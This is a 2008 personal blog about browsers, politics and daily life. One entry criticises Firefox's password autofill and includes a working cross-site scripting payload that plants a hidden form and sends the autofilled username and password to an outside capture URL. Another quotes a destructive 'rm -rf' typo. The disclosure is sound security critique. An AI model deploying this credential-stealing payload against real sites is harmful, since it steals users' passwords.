Radiac's Diary

Ho Ho Ho

2008-12-01T00:00:00-00:00

Slade is playing, the decorations are up for the 10th year in a row, and TCMI is online... it can mean only one thing: it's that magical time of year at radiac.net again!

Tee hee

2008-11-30T23:59:00-00:00

You know what to expect...

I Really Need To Fancy This Up

2008-10-29T08:35:09-00:00

Top of my to-do list for this site is adding a link feed so I can avoid short entries like this one.

BoingBoing linked to an amusing video of the presidential debates...

I'm not dead, just busy

2008-10-27T08:06:34-00:00

Well, that's the longest break we've ever had, I believe. Nearly a month and a half?!

In my defence, I have been very busy - I won't bore you with details, but in the middle of it all, my desktop caught a virus, twice, and I got paranoid so wiped my network. I still haven't had a chance to finish restoring files, and haven't got round to correctly restoring my e-mail - I did it wrong the first time, so all the archives are incorrectly dated to the 23rd September 2008. Woo.

When rebuilding my machines, I've switched to Ubuntu, almost. Still some Windows stuff I need (Office and Flash), so I'm dual-booting my desktop, and running a VM on the laptop.

I'm also having difficulty finding a good Gnome text editor. Although I'm happy with vim on the command line, I prefer something a bit more graphical on the desktop - eclipse is overkill, but everything else seems to be lacking some critical functionality, like syntax highlighting, being able to paste to where the cursor is, or opening files.

Just heard on the radio that people who want disability benefit from the state are going to have to have a medical check. You mean they didn't already?

Anyway, other highlights of the past few months include going to the Great British Cheese Festival in Cardiff, which was a bit rubbish compared to the previous two years, getting pulled over by a concerned road user after chunks of metal fell off my car, writing a jQuery cross-domain POST library and an MVC framework, teaching adults the theory of how to make websites, and we bought an ice cream maker to make Quintuple Chocolate Awesomeness a reality. And yes, it does taste as good as it sounds.

We Still Love Labour

2008-09-11T21:35:15-00:00

Today, our glorious leader Mr Brown announced measures to help people on low incomes who are struggling to pay their energy bills, and discounted insulation for the rest. That's nice.

However, I bring you an exclusive - my source inside the government has passed me this discarded early draft of his statement:

The taxpayer will pay for energy for the poor! What, you have a job? Already have insulation? Struggling to pay your rising mortgage, food bills and your own energy bills? Don't care - sell your house, downsize and give us the profit! You what, it's a market in freefall and you're in negative equity? Chuck the job, declare bankrupcy, sign on and qualify for your energy discount! Sorted! Who's going to pay for the energy when nobody's working? Not my problem - by then we'll have been voted out, and I'll be rolling in so much money from the lecture circuit that I won't care. Later, suckers - I'm off for a pint! Vote Labour!

Our economy is based almost entirely on services and cheap imports, with very little primary or secondary industry - and even those depend on fuel imports. This country has no inherent value. Our only exports are our sense of humour and David Beckham, and the international markets are just figuring that out. We're not the only country in this situation, but thanks to the short-sighted fiscal policies of our Labour overlords, we have no reserves to fall back on in our time of need. Citizens and government alike, it's less money in, more money out, and nothing left in the piggy bank.

Financially, it's the perfect storm. And the government's solution is to give us 50% off loft fluff.

Stupid and/or selfish politicians hunting for headlines got us into this mess, and they sure as hell aren't going to get us out. Enough is enough - we need to change the political system in this country to reward long-term decisions that are good for the country, rather than for the career options of MPs after they're forced from office.

And crap, now I'm on a watch list.

Chrome Falls Short

2008-09-06T00:16:38-00:00

I'm going to be controversial and go ahead and say I'm not at all impressed by Google's new browser.

Yes yes, I know, I'm sure that the dev team are sobbing as they read this. But they should have tried harder, even if this is a beta. Take their security model, for example. I'm very wary about installing firefox add-ons - it's potentially worse than installing a keylogger, or having my router compromised. What I want to see in my browser is a better security model for third party add-ons, and a proper sandbox that blocks plugins from getting through to my desktop and affecting anything on my system outside the browser. It's absurd that while the biggest risk these days are browser and plugin exploits, nobody is really doing anything about it; I'm at the point where I'm almost scared to browse on the same machine I do my online banking. Chrome's sandboxing is a step in the right direction, but it doesn't go nearly far enough - or even seem to work.

There are few interesting features, and most of those are borrowed from other projects; its sandboxing security model is flawed; I wrote a solution to persist cookies across its privacy mode in less than 10 minutes; even its fancy new javascript engine is outperformed by the new firefox engine, at least under certain conditions. And what is up with it thrashing my cpu and hard drive for several minutes after starting up? Right now, it's just not a particularly good browser.

Bottom line is it's too inconvenient for people to switch to from IE, it lacks the features that people are used to in Firefox, so in its current state it'll struggle against Opera and Safari. And yet we'll have to support it. Curse you, Google - the last thing we need is yet another browser to test in and develop for. It's all very well saying standards-based sites will be fine, but it still does things differently.

Beta or not, this had the potential to be better, and it's a shame it hasn't been realised.

Firebug Bug Explained: It's Firefox 3

2008-09-01T00:41:00-00:00

I have only swapped one of my machines to Firefox 3 because I rely on the net tab of Firebug for quite a bit of my work, and I've noticed problems with it in Firefox 3: downloads of files that were included on the page weren't showing up. It only seemed to happen when frames were involved, but as I do quite a bit of work with frames, that's a big deal for me. So I've been waiting patiently for the Firebug team to fix it, while I do my testing on my Firefox 2 machine.

Only now Rick Strahl says it looks like Firefox 3 ignores file caching rules, which totally explains why I'm missing the files from the net tab.

I'm pretty much speechless. We slam Microsoft on security and for ignoring standards, but when Firefox blocks any site that uses a self-signed or expired SSL cert, while their security team leaves gaping wide security holes in the quest for a better user experience, let alone when they go ahead and break one of the crucial underlying features of HTTP, we just sit back and say "oh, but it's open source, it's Mozilla - they know what they're doing, we can trust them." Why?

Ironic they've gone and broken one of my only two reasons for sticking with Firefox. How's Opera looking these days?

IE8 Beta 2 - Initial Impressions

2008-08-30T13:55:19-00:00

I've spent a few hours playing with IE8 b2, and although there are a lot of improvements, they all just seem to fall a little bit short of my expectations:

InPrivacy: like putting up a "Beware of the dog" sign on your gate, but not buying a dog. Took me less than half an hour to get my cookies to persist across an InPrivacy session. It was so easy I can't help thinking it was by design - after all, Microsoft's ads need to track people too.
IE8 in IE7 mode is not IE7. It might be close enough for most purposes, but it is not the same. I have only noticed one difference so far - but where there's one there's usually more. (For reference, the flash in a tiny iframe problem is in IE7, but not IE8 in IE7 mode)
Web developer toolbar: it has some very nice features, like the profiler tab (and js console, at last). It should give the Firefox plugins (Firebug and web developer) a run for their money - but it lacks a net tab. Fiddler is great, but as a separate proxy app, you lose a lot of useful capability and integration
Accelerators: nice idea, but the first one I expected (but didn't find) was a 'go to selected url'
Suggested sites: seems to completely ignore the page you are on - when I'm on slashdot.org, why do I get "5 websites that are similar to BBC - Homepage"? And when you do get the correct list, why are the suggestions so completely unrelated and irrelevant?
Tabs improvements, address bar searching, slightly better standards adherence - it's all very nice, but it's all been done before.
Where are the mouse gestures?

But despite all of this, I think I like it. I like it enough that when the final version comes out, I might actually consider swapping to it.

Ok, that's a lie - I'm too used to mouse gestures to give them up. But people have been pointing out that IE8 has little (if any) innovation as if it's a bad thing. I see that as a good thing - the IE dev team has been able to come along and hoover up the good ideas, the good aspects of the UI, and have left out the bad. All of the things I really hate about Firefox 3 just aren't there, and I no longer trust Mozilla when it comes to security (remember, I can steal your passwords), so literally the only reason I'd stay with Firefox are mouse gestures and the net tab - neither of which are core features.

There's no getting away from it - IE8 looks like it might be a good browser.

LAAFF 2008 Report

2008-08-27T22:52:47-00:00

It has been 2 and a half weeks since LAAFF, so it must be time for a report! The Friday evening saw Tristan, Mark and Meri arrive, followed shortly after by Peter and Charlene, who brought Rock Band. I cooked pizzas and sausage rolls until everyone was full, then I cooked some more just in case. Rock band was played into the night, and resumed in the morning while Laura, Natalie and Simon arrived. We then ate more food, played Mario Kart, and watched the excellent "Ninja Dragon" (which clearly wasn't two unrelated films randomly spliced together) before going out for a curry at the finest Indian restaurant in town. We watched another film, played Soul Calibur, slept (there was room everyone, hurrah), and then played Mario Kart some more before the LAAFF shuttle service took people off to the station. I thought people would drift away gradually depending on how far away they lived, but within an hour of the first person leaving, the house was empty again. Sadness. But apparently everyone had a good time, which is excellent. Thank you to everyone who came, and I know some of you had particularly long journeys, but it was good to meet up again. To re-live the good times, or for the curious non-LAAFF-ers, Natalie has provided photographic proof of the event on flikr.

There has been much news in the past month, but also much activity. More posts shall follow!

LAAFF 2008

2008-08-08T10:31:29-00:00

This weekend is the 117th LAAFF: Annual Atrocious Film Festival, and is being held in Cheltenham. The organisers are expecting better attendance than the previous 114 film festivals - which consisted of me slowly working my way through my DVD ollection.

I'm now expecting 8 friends from uni to arrive at my flat at some point today or tomorrow. This is sadly down from 10 as two had to drop out, but the up side is that 8 people are more likely to fit in my flat than 10. Especially as they will be sleeping on the floor.

I am now away to buy lots of food. Which will be fun - I don't know when the 8 people are arriving, so I have to buy enough food for 8, but not too much for 4. A challenge indeed, but one that I shall relish. Ooh, relish, there's an idea.

And just to clear up any confusion, the L in LAAFF has to stand for something different every time it's used. That is the law of absurd backronyms.

It's been a while

2008-07-22T19:27:49-00:00

No entries for weeks? That can mean only one thing - it's business as usual at chateau radiac.

Well, not quite; last week we had a couple of days off and went down to Bath for the day. Went into the bath spa thing for a couple of hours - was very relaxing, especially the steam rooms. Then went over to Shakeaway and had a wander round looking for pigs:

I have also finally joined twitter, so add me or follow me whatever it is you do on this thing.

In my free time over the past few weeks I've been playing with lots of other things on my "really should do that sometime" list, like trying to sync google calendars with my N95, fiddling with some interesting perl modules, reading around other frameworks to get interesting ideas, and buying more domains for sites that definitely will be written at some point in the distant future. Right now I'm fighting with my N95, trying to figure out why it doesn't show up in Vista, combining two of my favouritest things: Vista, and Nokia software. Good times.

What is wrong with me?

2008-07-03T18:20:40-00:00

Seen moments ago:

rm -rf /usr/lolcat/nginx

That's some serious typo skills - some part of my brain meant to write that. You know that bit in that show where that guy realises he's going insane? I'm that guy.

I am in your Firefox, stealing your Passwords

2008-06-25T21:39:44-00:00

The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.

In Firefox 3, they introduced stricter SSL certificate checks that give you an error page that you can't turn off. It's a usability nightmare if it's a site you want to get in to; there are 4 mouse clicks, all over the screen to add the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who may run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load balanced secure site, for example.

Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.

Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?

I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.

Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!

Bugzilla comments say if you've got a form like that, you should set the autocomplete="no" form attribute. Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.

But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:

Leave a new comment:

I LOVE THIS SITE, AAA+++++++=+++!!!1!
<script>
document.write('<form style="display:none">' +
  '<input type="text" name="username" id="username">' +
  '<input type="password" name="password"></form>');
window.onload = function () {
  (new Image).src = 'http://radiac.net/capture?u=' +
    document.getElementsByName('username')[0].value +
    '&p=' + document.getElementsByName('password')[0].value
  ;
}
</script>

Profit.

That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:

I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.

Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!

Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure Quicktime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.

Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.

Flash, Iframes and IE

2008-06-15T09:50:55-00:00

Here's another fun little flash/ie fact: putting a 1x1 swf inside a 1x1 iframe fails in IE, at least if you want to use ExternalInterface. It seems that the iframe has to be 18px by 18px - and Google and I have no idea why. Any suggestions?

Update: It's just callbacks that are unavailable, and the iframe seems to need to be on the page. No workaround found, I'm afraid.

Sun's out, trains off

2008-06-14T17:50:55-00:00

Has anyone else noticed how the RMT only ever strikes when it's sunny?